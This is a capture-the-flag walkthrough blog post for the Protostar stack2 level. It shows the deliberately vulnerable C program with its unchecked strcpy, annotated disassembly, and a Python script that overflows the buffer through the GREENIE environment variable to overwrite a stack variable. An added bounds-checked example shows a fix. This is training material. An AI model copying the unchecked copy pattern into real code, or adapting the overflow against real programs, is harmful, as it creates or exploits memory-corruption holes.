Binary Exploitation Protostar Stack2 - Walkthrough - Writeup

Posted by Suraj Singh on April 07, 2018 · 10 mins read
Hello Guys,

In this post, I am going to show you how we can win the Protostar stack2 level. Today's focus is on variable overwriting and environment-variable manipulation: in this challenge we learn how an environment variable can serve as a bridge onto the stack, so that the value of a neighbouring stack variable gets overwritten while the program is running.

Before starting this walkthrough, I want to highlight a few points.

  • I'm not the creator of the Protostar war game; I am just a player.
  • Here I am just providing hints and references, so if you feel stuck anywhere, take a look here.


Source Code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>   /* declares errx(); without it the call is only implicitly declared */

int main(int argc, char **argv)
{
    volatile int modified;   /* sits on the stack right after buffer */
    char buffer[64];
    char *variable;

    variable = getenv("GREENIE");

    if(variable == NULL) {
        errx(1, "please set the GREENIE environment variable\n");
    }

    modified = 0;

    /* no length check: strcpy() copies GREENIE until its NUL byte,
       so anything beyond 64 bytes spills over into modified */
    strcpy(buffer, variable);

    if(modified == 0x0d0a0d0a) {
        printf("you have correctly modified the variable\n");
    } else {
        printf("Try again, you got 0x%08x\n", modified);
    }

}
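The whole level rests on strcpy() trusting the length of an environment variable. As an added example (not part of this walkthrough or of the Protostar sources), here is what the copy looks like when the program checks the length first: copy_env_bounded(), accepts_length() and BUFSZ are names chosen for this illustration, and the strings accepts_length() builds are constructed test input.

```c
/* Added example: a bounds-checked counterpart of stack2's strcpy() call.
 * Not part of the walkthrough or the Protostar sources; copy_env_bounded(),
 * accepts_length() and BUFSZ are names chosen for this illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFSZ 64   /* same size as stack2's buffer[64] */

/* Copy value into dst only when it fits together with its NUL terminator.
 * Returns 0 on success and -1 (writing nothing) when value is NULL or no
 * terminator appears within dstsz bytes, i.e. the string is too long.
 * memchr() never reads past dstsz, so an unterminated input is also safe. */
int copy_env_bounded(char *dst, size_t dstsz, const char *value)
{
    if (value == NULL || dstsz == 0)
        return -1;
    const char *nul = memchr(value, '\0', dstsz);
    if (nul == NULL)
        return -1;                      /* strlen(value) >= dstsz */
    memcpy(dst, value, (size_t)(nul - value) + 1);
    return 0;
}

/* Policy check helper: build a constructed string of n 'A' bytes and report
 * whether copy_env_bounded() accepts it into a BUFSZ buffer. The `modified`
 * slot mirrors stack2's frame; with the bounded copy it is never reached,
 * so it stays 0 (a return of -2 would mean it had been clobbered). */
int accepts_length(size_t n)
{
    char *value = malloc(n + 1);
    if (value == NULL)
        return -1;
    memset(value, 'A', n);
    value[n] = '\0';

    volatile int modified = 0;
    char buffer[BUFSZ];
    int rc = copy_env_bounded(buffer, sizeof buffer, value);
    free(value);
    return (modified == 0) ? rc : -2;
}

int main(void)
{
    const char *variable = getenv("GREENIE");
    if (variable == NULL) {
        fprintf(stderr, "please set the GREENIE environment variable\n");
        return 1;
    }
    char buffer[BUFSZ];
    if (copy_env_bounded(buffer, sizeof buffer, variable) != 0) {
        fprintf(stderr, "GREENIE too long: at most %d bytes are accepted\n", BUFSZ - 1);
        return 1;
    }
    printf("copied %zu bytes; nothing past buffer was written\n", strlen(buffer));
    return 0;
}
```

The rejection limit is 63 bytes of content plus the terminator, so the 68-byte value used later in this walkthrough is refused before anything is written. Checking with memchr() bounded by the destination size, rather than strlen() on the source, also avoids scanning an unterminated value.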



Hint Provided By Exploit Exercises

Stack2 looks at environment variables, and how they can be set.

This level is at /opt/protostar/bin/stack2


Stack

0                        28                                                      92        96
============================================================================================
Other Things | Injectable Area | modified |
============================================================================================



Disassembly of main

Dump of assembler code for function main:
0x08048494 <+0>: push ebp
0x08048495 <+1>: mov ebp,esp
0x08048497 <+3>: and esp,0xfffffff0
0x0804849a <+6>: sub esp,0x60 << ==== reserve a 0x60 = 96 byte stack frame
0x0804849d <+9>: mov DWORD PTR [esp],0x80485e0 << ==== place the address of the "GREENIE" string on the stack top as getenv's argument
0x080484a4 <+16>: call 0x804837c <getenv@plt> << ==== call getenv
0x080484a9 <+21>: mov DWORD PTR [esp+0x5c],eax << ==== store the returned pointer (the `variable` local) at [esp+0x5c]
0x080484ad <+25>: cmp DWORD PTR [esp+0x5c],0x0 << ==== compare `variable` with NULL
0x080484b2 <+30>: jne 0x80484c8 <main+52> << ==== jump past errx if GREENIE was set
0x080484b4 <+32>: mov DWORD PTR [esp+0x4],0x80485e8
0x080484bc <+40>: mov DWORD PTR [esp],0x1
0x080484c3 <+47>: call 0x80483bc <errx@plt>
0x080484c8 <+52>: mov DWORD PTR [esp+0x58],0x0 << ==== modified = 0, stored at [esp+0x58]
0x080484d0 <+60>: mov eax,DWORD PTR [esp+0x5c] << ==== load the GREENIE pointer from the stack into EAX
0x080484d4 <+64>: mov DWORD PTR [esp+0x4],eax << ==== second strcpy argument: the source pointer
0x080484d8 <+68>: lea eax,[esp+0x18] << ==== address of buffer, which starts at [esp+0x18]
0x080484dc <+72>: mov DWORD PTR [esp],eax << ==== first strcpy argument: the destination buffer
0x080484df <+75>: call 0x804839c <strcpy@plt> << ==== call strcpy (no length check)
0x080484e4 <+80>: mov eax,DWORD PTR [esp+0x58] << ==== load modified
0x080484e8 <+84>: cmp eax,0xd0a0d0a << ==== compare it with 0x0d0a0d0a
0x080484ed <+89>: jne 0x80484fd <main+105>
0x080484ef <+91>: mov DWORD PTR [esp],0x8048618
0x080484f6 <+98>: call 0x80483cc <puts@plt>
0x080484fb <+103>: jmp 0x8048512 <main+126>
0x080484fd <+105>: mov edx,DWORD PTR [esp+0x58]
0x08048501 <+109>: mov eax,0x8048641
0x08048506 <+114>: mov DWORD PTR [esp+0x4],edx
0x0804850a <+118>: mov DWORD PTR [esp],eax
0x0804850d <+121>: call 0x80483ac <printf@plt>
0x08048512 <+126>: leave
0x08048513 <+127>: ret


Exploit

#!/usr/bin/env python3
# -*- coding:utf-8 -*-

# import modules
import os
import struct

# buffer starts at [esp+0x18] and modified at [esp+0x58], so strcpy() has
# to write 0x58 - 0x18 = 0x40 = 64 bytes of filler before it reaches modified
OFFSET = 0x58 - 0x18

# 0x0d0a0d0a as it must lie in memory on x86 (little-endian): 0a 0d 0a 0d
target = struct.pack('<I', 0x0d0a0d0a)

payload = b'A' * OFFSET + target

# strcpy() stops at the first NUL byte; the payload contains none,
# so all 68 bytes are copied
assert b'\x00' not in payload

# hand the payload to the program through the GREENIE environment variable
# (every byte is below 0x80, so the latin-1 round trip keeps it unchanged)
os.environ['GREENIE'] = payload.decode('latin-1')

# run
os.system('./bin/stack2')





Another Victory! Yeah


For a more detailed walkthrough, check the YouTube video playlist linked below.

Bitforestinfo YouTube Protostar CTF Playlist